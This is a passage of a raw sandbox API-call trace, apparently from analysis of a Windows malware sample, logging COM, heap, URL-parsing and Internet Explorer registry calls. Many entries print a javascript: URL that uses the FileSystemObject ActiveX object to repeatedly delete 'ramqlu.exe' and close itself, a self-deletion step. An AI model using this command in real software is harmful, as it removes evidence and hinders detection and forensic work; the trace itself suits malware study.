(nIndex=23) returned 0x0 [0066.645] GetSysColor (nIndex=24) returned 0xe1ffff [0066.645] GetSysColor (nIndex=25) returned 0x0 [0066.645] GetSysColor (nIndex=26) returned 0xcc6600 [0066.645] GetSysColor (nIndex=27) returned 0xead1b9 [0066.645] GetSysColor (nIndex=28) returned 0xf2e4d7 [0066.645] GetSysColor (nIndex=29) returned 0xff9933 [0066.645] GetSysColor (nIndex=30) returned 0xf0f0f0 [0066.645] GetSysColor (nIndex=31) returned 0x0 [0066.645] GetSysColor (nIndex=32) returned 0x0 [0066.645] GetSysColor (nIndex=33) returned 0x0 [0066.645] GetSysColor (nIndex=34) returned 0x0 [0066.645] GetSysColor (nIndex=35) returned 0x0 [0066.646] GetSysColor (nIndex=36) returned 0x0 [0066.646] GetSysColor (nIndex=37) returned 0x0 [0066.646] GetSysColor (nIndex=38) returned 0x0 [0066.646] GetSysColor (nIndex=39) returned 0x0 [0066.646] GetSysColor (nIndex=40) returned 0x0 [0066.646] GetSysColor (nIndex=41) returned 0x0 [0066.646] GetSysColor (nIndex=42) returned 0x0 [0066.646] GetSysColor (nIndex=43) returned 0x0 [0066.646] GetSysColor (nIndex=44) returned 0x0 [0066.646] GetSysColor (nIndex=45) returned 0x0 [0066.646] GetSysColor (nIndex=46) returned 0x0 [0066.646] GetSysColor (nIndex=47) returned 0x0 [0066.646] GetSysColor (nIndex=48) returned 0x0 [0066.646] GetSysColor (nIndex=49) returned 0x0 [0066.646] GetSysColor (nIndex=50) returned 0x0 [0066.646] GetSysColor (nIndex=51) returned 0x0 [0066.646] GetSysColor (nIndex=52) returned 0x0 [0066.646] GetSysColor (nIndex=53) returned 0x0 [0066.646] GetSysColor (nIndex=54) returned 0x0 [0066.646] GetSysColor (nIndex=55) returned 0x0 [0066.646] GetSysColor (nIndex=56) returned 0x0 [0066.646] GetSysColor (nIndex=57) returned 0x0 [0066.646] GetSysColor (nIndex=58) returned 0x0 [0066.646] GetSysColor (nIndex=59) returned 0x0 [0066.646] GetSysColor (nIndex=60) returned 0x0 [0066.646] GetSysColor (nIndex=61) returned 0x0 [0066.646] GetSysColor (nIndex=62) returned 0x0 [0066.646] GetSysColor (nIndex=63) returned 0x0 [0066.646] GetDeviceCaps (hdc=0x1b0101ce, index=38) returned 32409 [0066.646] ReleaseDC (hWnd=0x0, hDC=0x1b0101ce) returned 1 [0066.647] GetCurrentThreadId () returned 0x90 [0066.647] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x43f9e0 [0066.647] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x50) returned 0x44f470 [0066.648] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x42d878 [0066.648] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x28) returned 0x42d2a0 [0066.648] GetProcAddress (hModule=0x76e40000, lpProcName=0x8) returned 0x76e43ed5 [0066.648] GetCurrentThreadId () returned 0x90 [0066.648] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d878 | out: hHeap=0x410000) returned 1 [0066.648] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x11c) returned 0x451fc0 [0066.648] ParseURLW (in: pcszURL="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", ppu=0x2cf5c8 | out: ppu=0x2cf5c8) returned 0x0 [0066.648] CreateUri (in: pwzURI="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x2cf5ac | out: ppURI=0x2cf5ac*=0x43bfcc) returned 0x0 [0066.649] IUnknown:AddRef (This=0x43bfcc) returned 0x6 [0066.649] IInternetSecurityManager:MapUrlToZone (in: This=0x750296bc, pwszUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", pdwZone=0x2cf54c, dwFlags=0x0 | out: pdwZone=0x2cf54c*=0xffffffff) returned 0x800c0011 [0066.649] DllGetClassObject (in: rclsid=0x44120c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cee20 | out: ppv=0x2cee20*=0x75028d20) returned 0x0 [0066.649] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2cef0c | out: ppvObject=0x2cef0c*=0x75028d2c) returned 0x0 [0066.650] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.650] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", ParseAction=3, dwParseFlags=0x0, pwzResult=0x4520e8, cchResult=0x8c, pcchResult=0x2cef54, dwReserved=0x0 | out: pwzResult="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", pcchResult=0x2cef54*=0x8c) returned 0x0 [0066.650] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x11c) returned 0x452208 [0066.650] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x452208 | out: hHeap=0x410000) returned 1 [0066.650] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.650] DllGetClassObject (in: rclsid=0x44120c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cee20 | out: ppv=0x2cee20*=0x75028d20) returned 0x0 [0066.650] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2cef0c | out: ppvObject=0x2cef0c*=0x75028d2c) returned 0x0 [0066.650] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.651] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", ParseAction=17, dwParseFlags=0x0, pwzResult=0x4520e8, cchResult=0x8c, pcchResult=0x2cef64, dwReserved=0x0 | out: pwzResult="", pcchResult=0x2cef64*=0x0) returned 0x800c0011 [0066.651] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.651] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0066.651] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0066.651] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0066.651] IInternetSecurityManager:ProcessUrlAction (in: This=0x750296bc, pwszUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", dwAction=0x2700, pPolicy=0x2cf550, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x2cf550*=0x0) returned 0x0 [0066.651] IUnknown:Release (This=0x43bfcc) returned 0x5 [0066.651] IUnknown:Release (This=0x43bfcc) returned 0x4 [0066.651] IUnknown:AddRef (This=0x43bfcc) returned 0x5 [0066.651] IUri:GetPropertyDWORD (in: This=0x43bfcc, uriProp=0x11, pdwProperty=0x2cf384, dwFlags=0x0 | out: pdwProperty=0x2cf384*=0xf) returned 0x0 [0066.651] IInternetSecurityManager:GetSecurityId (in: This=0x444c48, pwszUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", pbSecurityId=0x2cf3e0, pcbSecurityId=0x2cf3dc*=0x200, dwReserved=0x0 | out: pbSecurityId=0x2cf3e0*=0x6a, pcbSecurityId=0x2cf3dc*=0x8f) returned 0x0 [0066.651] IInternetSecurityManager:GetSecurityId (in: This=0x750296bc, pwszUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", pbSecurityId=0x2cf3e0, pcbSecurityId=0x2cf3dc*=0x200, dwReserved=0x0 | out: pbSecurityId=0x2cf3e0*=0x0, pcbSecurityId=0x2cf3dc*=0x200) returned 0x800c0011 [0066.651] IUnknown:Release (This=0x43bfcc) returned 0x4 [0066.651] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0066.651] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8f) returned 0x4520e8 [0066.652] CoInternetGetSession (in: dwSessionMode=0x0, ppIInternetSession=0x2cf604, dwReserved=0x0 | out: ppIInternetSession=0x2cf604*=0x43f548) returned 0x0 [0066.652] IInternetSession:RegisterNameSpace (This=0x43f548, pCF=0x75028c50, rclsid=0x74c29790, pwzProtocol="res", cPatterns=0x0, ppwzPatterns=0x0, dwReserved=0x0) returned 0x0 [0066.652] IUnknown:AddRef (This=0x75028c50) returned 0x1 [0066.652] IInternetSession:RegisterNameSpace (This=0x43f548, pCF=0x75028c70, rclsid=0x74c29780, pwzProtocol="about", cPatterns=0x0, ppwzPatterns=0x0, dwReserved=0x0) returned 0x0 [0066.653] IUnknown:AddRef (This=0x75028c70) returned 0x1 [0066.653] StrCmpICW (pszStr1="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", pszStr2="res://ieframe.dll/PhishSite.htm") returned -8 [0066.653] IUnknown:QueryInterface (in: This=0x43c254, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2cf574 | out: ppvObject=0x2cf574*=0x43c254) returned 0x0 [0066.653] IUnknown:Release (This=0x43c254) returned 0x9 [0066.653] IUnknown:AddRef (This=0x43c254) returned 0xa [0066.653] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x12c) returned 0x452180 [0066.653] IUnknown:AddRef (This=0x43c254) returned 0xb [0066.653] IUnknown:QueryInterface (in: This=0x43c254, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2cf538 | out: ppvObject=0x2cf538*=0x43c254) returned 0x0 [0066.653] IUnknown:Release (This=0x43c254) returned 0xb [0066.653] IUnknown:AddRef (This=0x43c254) returned 0xc [0066.653] IUnknown:Release (This=0x43c254) returned 0xb [0066.653] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x3c) returned 0x424338 [0066.654] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xb4) returned 0x4522b8 [0066.654] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x42d878 [0066.654] IUri:GetScheme (in: This=0x43c254, pdwScheme=0x2cf5bc | out: pdwScheme=0x2cf5bc*=0xf) returned 0x0 [0066.654] IUnknown:QueryInterface (in: This=0x43c254, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2cf5c4 | out: ppvObject=0x2cf5c4*=0x43c254) returned 0x0 [0066.654] IUnknown:Release (This=0x43c254) returned 0xb [0066.654] IUnknown:AddRef (This=0x43c254) returned 0xc [0066.654] IUnknown:Release (This=0x43c254) returned 0xb [0066.654] IUri:IsEqual (in: This=0x43bfcc, pUri=0x43c254, pfEqual=0x2cf604 | out: pfEqual=0x2cf604*=1) returned 0x0 [0066.654] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0066.654] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x4c) returned 0x44f4c8 [0066.654] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x12) returned 0x452930 [0066.654] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4530f8 [0066.655] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x42d8e8 [0066.655] PostMessageW (hWnd=0x202ae, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0066.655] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x12c) returned 0x453160 [0066.655] IUnknown:AddRef (This=0x43c254) returned 0xc [0066.655] IUnknown:QueryInterface (in: This=0x43c254, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2cf558 | out: ppvObject=0x2cf558*=0x43c254) returned 0x0 [0066.655] IUnknown:Release (This=0x43c254) returned 0xc [0066.655] IUnknown:AddRef (This=0x43c254) returned 0xd [0066.655] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x4c) returned 0x44f520 [0066.655] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x68) returned 0x453298 [0066.655] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x108) returned 0x453308 [0066.655] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x43f968 [0066.655] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xcc) returned 0x43c680 [0066.655] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x451598 [0066.655] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x42d920 [0066.656] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x1b0) returned 0x453418 [0066.656] IUnknown:QueryInterface (in: This=0x43c254, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2cf25c | out: ppvObject=0x2cf25c*=0x43c254) returned 0x0 [0066.656] IUnknown:Release (This=0x43c254) returned 0xd [0066.656] IUnknown:AddRef (This=0x43c254) returned 0xe [0066.656] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0066.656] IUnknown:AddRef (This=0x43c254) returned 0xf [0066.656] IUnknown:AddRef (This=0x43c254) returned 0x10 [0066.656] IUnknown:QueryInterface (in: This=0x43c254, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2cf250 | out: ppvObject=0x2cf250*=0x43c254) returned 0x0 [0066.656] IUnknown:Release (This=0x43c254) returned 0x10 [0066.656] IUnknown:AddRef (This=0x43c254) returned 0x11 [0066.656] IUri:GetScheme (in: This=0x43c254, pdwScheme=0x453520 | out: pdwScheme=0x453520*=0xf) returned 0x0 [0066.656] IMoniker:IsSystemMoniker (in: This=0x4206a8, pdwMksys=0x2cf2b8 | out: pdwMksys=0x2cf2b8*=0x6) returned 0x0 [0066.745] IUri:GetSchemeName (in: This=0x43c254, pbstrSchemeName=0x2cf210 | out: pbstrSchemeName=0x2cf210*="javascript") returned 0x0 [0066.745] _wcsnicmp (_String1="javas", _String2="data", _MaxCount=0x5) returned 6 [0066.745] IUri:GetScheme (in: This=0x43c254, pdwScheme=0x2cf25c | out: pdwScheme=0x2cf25c*=0xf) returned 0x0 [0066.745] IUnknown:QueryInterface (in: This=0x43c254, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2cf21c | out: ppvObject=0x2cf21c*=0x43c254) returned 0x0 [0066.745] IUnknown:Release (This=0x43c254) returned 0x11 [0066.745] IUnknown:AddRef (This=0x43c254) returned 0x12 [0066.745] CoInternetQueryInfo (in: pwzUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", QueryOptions=0xd, dwQueryFlags=0x0, pvBuffer=0x2cf24c, cbBuffer=0x4, pcbBuffer=0x2cf244, dwReserved=0x0 | out: pvBuffer=0x2cf24c*, pcbBuffer=0x2cf244*=0x4) returned 0x0 [0066.746] DllGetClassObject (in: rclsid=0x44120c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cf0d4 | out: ppv=0x2cf0d4*=0x75028d20) returned 0x0 [0066.746] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2cf1c0 | out: ppvObject=0x2cf1c0*=0x75028d2c) returned 0x0 [0066.746] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.749] CoInternetParseUrl (in: pwzUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", ParseAction=0x13, dwFlags=0x0, pszResult=0x2cd180, cchResult=0x1000, pcchResult=0x2cd17c, dwReserved=0x0 | out: pszResult="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", pcchResult=0x2cd17c) returned 0x0 [0066.749] DllGetClassObject (in: rclsid=0x44120c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cd010 | out: ppv=0x2cd010*=0x75028d20) returned 0x0 [0066.749] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2cd0fc | out: ppvObject=0x2cd0fc*=0x75028d2c) returned 0x0 [0066.750] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.750] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", ParseAction=19, dwParseFlags=0x0, pwzResult=0x2cd180, cchResult=0x1000, pcchResult=0x2cd17c, dwReserved=0x0 | out: pwzResult="A퇬,䄎盞䆶ꠂ￾￿⋦盔⑆盔Ɯ", pcchResult=0x2cd17c*=0x2cd11c) returned 0x800c0011 [0066.750] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.750] ParseURLW (in: pcszURL="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", ppu=0x2cd14c | out: ppu=0x2cd14c) returned 0x0 [0066.853] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.853] IUnknown:Release (This=0x43c254) returned 0x11 [0066.853] IUnknown:QueryInterface (in: This=0x43c254, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2cf25c | out: ppvObject=0x2cf25c*=0x43c254) returned 0x0 [0066.853] IUnknown:Release (This=0x43c254) returned 0x11 [0066.853] IUnknown:AddRef (This=0x43c254) returned 0x12 [0066.854] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x4c) returned 0x44f578 [0066.854] GetCurrentThreadId () returned 0x90 [0066.854] CreateBindCtx (in: reserved=0x0, ppbc=0x2cf2a0 | out: ppbc=0x2cf2a0*=0x4503c0) returned 0x0 [0066.854] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xc) returned 0x4515b0 [0066.854] IUnknown:AddRef (This=0x4503c0) returned 0x2 [0066.854] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x1c) returned 0x445b28 [0066.854] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf184 | out: phkResult=0x2cf184*=0x198) returned 0x0 [0066.855] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf188 | out: phkResult=0x2cf188*=0x12c) returned 0x0 [0066.855] RegOpenKeyExW (in: hKey=0x12c, lpSubKey="FEATURE_XSSFILTER", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf144 | out: phkResult=0x2cf144*=0x0) returned 0x2 [0066.855] RegOpenKeyExW (in: hKey=0x198, lpSubKey="FEATURE_XSSFILTER", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf144 | out: phkResult=0x2cf144*=0x1a0) returned 0x0 [0066.855] SHRegGetValueW () returned 0x2 [0066.855] SHRegGetValueW () returned 0x2 [0066.855] RegCloseKey (hKey=0x1a0) returned 0x0 [0066.855] RegCloseKey (hKey=0x0) returned 0x6 [0066.855] RegCloseKey (hKey=0x0) returned 0x6 [0066.855] RegCloseKey (hKey=0x198) returned 0x0 [0066.855] RegCloseKey (hKey=0x12c) returned 0x0 [0066.855] RegisterBindStatusCallback (in: pBC=0x4503c0, pBSCb=0x453428, ppBSCBPrev=0x0, dwReserved=0x0 | out: ppBSCBPrev=0x0) returned 0x0 [0066.855] IUnknown:AddRef (This=0x453428) returned 0x4 [0066.856] IUnknown:QueryInterface (in: This=0x453428, riid=0x768261d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x2cf1ec | out: ppvObject=0x2cf1ec*=0x45342c) returned 0x0 [0066.856] IMoniker:RemoteBindToStorage (in: This=0x4206a8, pbc=0x4503c0, pmkToLeft=0x0, riid=0x74c1f8b0, ppvObj=0x2cf238 | out: ppvObj=0x2cf238*=0x0) returned 0x401e8 [0066.856] DllGetClassObject (in: rclsid=0x44120c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2ced70 | out: ppv=0x2ced70*=0x75028d20) returned 0x0 [0066.856] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2cee5c | out: ppvObject=0x2cee5c*=0x75028d2c) returned 0x0 [0066.857] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.857] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", ParseAction=1, dwParseFlags=0x10000, pwzResult=0x453eb0, cchResult=0x824, pcchResult=0x2cf170, dwReserved=0x0 | out: pwzResult="", pcchResult=0x2cf170*=0x0) returned 0x800c0011 [0066.857] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.857] IUnknown:QueryInterface (in: This=0x453428, riid=0x7682ad24*(Data1=0xaaa74ef9, Data2=0x8ee7, Data3=0x4659, Data4=([0]=0x88, [1]=0xd9, [2]=0xf8, [3]=0xc5, [4]=0x4, [5]=0xda, [6]=0x73, [7]=0xcc)), ppvObject=0x2cf100 | out: ppvObject=0x2cf100*=0x453428) returned 0x0 [0066.857] IBindStatusCallbackEx:RemoteGetBindInfoEx (in: This=0x453428, grfBINDF=0x4554cc, pbindinfo=0x45557c, pstgmed=0x4554d0, grfBINDF2=0x2cf14c, pdwReserved=0x80004005 | out: grfBINDF=0x4554cc*=0x83, pbindinfo=0x45557c, pstgmed=0x4554d0, grfBINDF2=0x2cf14c*=0x0, pdwReserved=0x80004005) returned 0x0 [0066.857] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf020 | out: phkResult=0x2cf020*=0x12c) returned 0x0 [0066.857] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf024 | out: phkResult=0x2cf024*=0x198) returned 0x0 [0066.857] RegOpenKeyExW (in: hKey=0x198, lpSubKey="FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", ulOptions=0x0, samDesired=0x1, phkResult=0x2cefe0 | out: phkResult=0x2cefe0*=0x0) returned 0x2 [0066.858] RegOpenKeyExW (in: hKey=0x12c, lpSubKey="FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", ulOptions=0x0, samDesired=0x1, phkResult=0x2cefe0 | out: phkResult=0x2cefe0*=0x0) returned 0x2 [0066.858] RegCloseKey (hKey=0x0) returned 0x6 [0066.858] RegCloseKey (hKey=0x0) returned 0x6 [0066.858] RegCloseKey (hKey=0x12c) returned 0x0 [0066.858] RegCloseKey (hKey=0x198) returned 0x0 [0066.858] IUnknown:Release (This=0x453428) returned 0x5 [0066.858] IUnknown:QueryInterface (in: This=0x453428, riid=0x768146b8*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2cf0c8 | out: ppvObject=0x2cf0c8*=0x0) returned 0x80004002 [0066.858] IServiceProvider:QueryService (in: This=0x45342c, guidService=0x768146b8*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x768146b8*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2cf0c8 | out: ppvObject=0x2cf0c8*=0x0) returned 0x80004002 [0066.858] GetCurrentThreadId () returned 0x90 [0066.859] DllGetClassObject (in: rclsid=0x44120c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), 